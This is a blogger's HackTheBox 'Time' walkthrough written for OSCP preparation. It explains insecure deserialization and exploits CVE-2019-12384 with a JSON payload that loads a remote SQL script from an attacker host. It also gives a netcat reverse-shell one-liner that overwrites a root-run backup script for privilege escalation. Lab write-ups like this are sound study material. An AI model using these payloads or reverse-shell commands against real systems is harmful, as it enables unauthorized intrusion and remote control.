HTB — Time (OSCP Prep)

“It was the best of times, it was the worst of times.”― Charles Dickens, A Tale of Two Cities

Hello friends! This is the 26th walkthrough of our OSCP Preparation. I hope you’re enjoying my content. I’m planning to solve all the HTB as long as I have time and patience :)

Let’s start our enumeration with nmap as usual :

Findings :
+ port 22 : It’s an ssh service running.
+ port 80 : Apache webserver hosts a webpage with a title “Online JSON parser”

I have no idea about “JSON parser” and googling this :
A JSON (JavaScript Object Notation) parser is a program that reads a JSON-formatted text file and converts it into a more easily usable data structure, such as a dictionary or a list in Python or an object in JavaScript.

So what we understand from this is that JSON is some kind of a text file in JavaScript language and parser helps us to read it easily.

And another question : What is JSON ?
“JSON is a lightweight format for storing and transporting data.”
“JSON is often used when data is sent from a server to a web page.”

Example :

{
"employees":[
    {"firstName":"John", "lastName":"Doe"},
    {"firstName":"Anna", "lastName":"Smith"},
    {"firstName":"Peter", "lastName":"Jones"}
]
}

As you can see here that data is in name : “value” pairs and they are seperated by commas. And curly brackets hold these objects and square brackets to hold the arrays.

Good, at least we have an idea about JSON before starting the enumeration. Let’s keep going and navigate to the webpage :

OK. There is one more thing for us here. What is JSON Beautfier / Validator ?

A JSON beautifier is a tool that simplifies the process of formatting cluttered JSON code into a well-structured format by adding indents and line breaks.
A JSON Validator is a tool that checks JSON data for proper syntax and structure.

This means that this tool will try to check our JSON data and will try to write it in a proper format. Let’s enter a text and beautify it :

Then I tried the same process with the “Validate” option and got the following error :

“Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object”

I have no idea what’s going on right now, but what I did was googling the error here : “com.fasterxml.jackson exploit”. I found some websites which mentions that an attacker may attempt to exploit an Insecure Deserialization Vulnerability in FasterXML jackson-databind.

OK. I have zero IT background, and I still don’t know what I need to do here. So I asked ChatGPT in order to explain the Serialization & Deserialization :
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Step1. Understanding Serialization and Deserialization :
In programming, serialization converts objects into text or binary format so they can be stored or sent over a network.
* Example : Serialization in JSON format.
Imagine we have a user object with a name and age :

{
  "name": "Alice",
  "age": 25
}

This is a serialized version of a user. The data is structured in JSON format so it can be easily stored or transferred.

What is Deserialization?

Deserialization is the reverse of serialization. It takes the stored data (JSON, XML, or binary) and converts it back into an object that a program can use.

🔹 Example: Deserialization in JavaScript Let’s say we receive a JSON string:

'{"name": "Alice", "age": 25}'

If we deserialize this in JavaScript, we get an object:

let user = JSON.parse('{"name": "Alice", "age": 25}');
console.log(user.name);  // Output: Alice
console.log(user.age);   // Output: 25

Now, our JSON string has been converted back into a usable object.

Danger Zone: If we deserialize untrusted data without checking it first, attackers can inject malicious content, which brings us to our next step.

Step 2: What is Insecure Deserialization?
Insecure deserialization happens when an application blindly trusts and processes untrusted data.
An attacker could modify the data before sending it to the server. If the server executes this malicious data, the attacker might gain control of the system.

Step 3: How Attackers Exploit Insecure Deserialization
* Remote Code Execution (RCE)
Attack Idea: If an attacker injects a malicious script inside a serialized object, it might get executed when the data is deserialized.

Example Attack Scenario:

A web app accepts user data in JSON format.
It deserializes this data without validation.
The attacker modifies the JSON to include a hidden payload.
The server processes this dangerous input and executes unwanted actions.

Summary
1️⃣ Serialization converts an object into a format for storage or transfer (e.g., JSON).
2️⃣ Deserialization converts it back into an object.
3️⃣ Insecure deserialization happens when an app blindly processes untrusted data.
4️⃣ Attackers can inject malicious payloads for Remote Code Execution (RCE).

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

I think we have an idea right now, but, still I have further questions. For example, our error starts with : “com.fasterxml.jackson”. For example what is “jackson” ? Let’s go further and ask another question : “can we find somehow a RCE related to this error?”
Googling “com.fasterxml.jackson exploit” led me different articles and github pages. For example, one of them analyzes the vulnerability of CVE-2019–12384.

Jackson gadgets — Anatomy of a vulnerability

Jackson gadgets — Anatomy of a vulnerability

Jackson gadgets — Anatomy of a vulnerabilityblog.doyensec.com

According to the article, an attacker leverages this deserialization vulnerability to trigger an SSRF & RCE.

The Github page :

GitHub — jas502n/CVE-2019–12384: Jackson Rce For CVE-2019–12384

Jackson Rce For CVE-2019–12384 . Contribute to jas502n/CVE-2019–12384 development by creating an account on GitHub.

github.com

Let’s clone the repository to our local. Our process will be creating an inject.sql file, fetch the file from the attacking machine using the payload.

inject.sql :

Now we need to serve this :

python3 -m http.server 4444

And in order to catch the reverse shell I need a nc listener :

nc -lvnp 1234

Below payload will be provided as input :

[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.33:4444/inject.sql'\"}]

We got the shell as the user pericles.

Privilege Escalation :

Running linpeas showed us that there is a script “timer_backup.sh” inside the directory /usr/bin/ which is writeable by normal users.

As the user pericles it has rwx access however when I tried to run, it gave an error.

One thing is suprising, although pericles has all the rights he cannot run the script!

And in the script the zip file is moved under the root directory. Hence it must be run by root itself!

If I edit the script I can gain root privileges:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.33 8881 >/tmp/f' > /usr/bin/timer_backup.sh

and after a few seconds later:

#QED!

Perikles hält die Leichenrede (Pericles’ Funeral Oration), an 1852 painting by Philipp Foltz.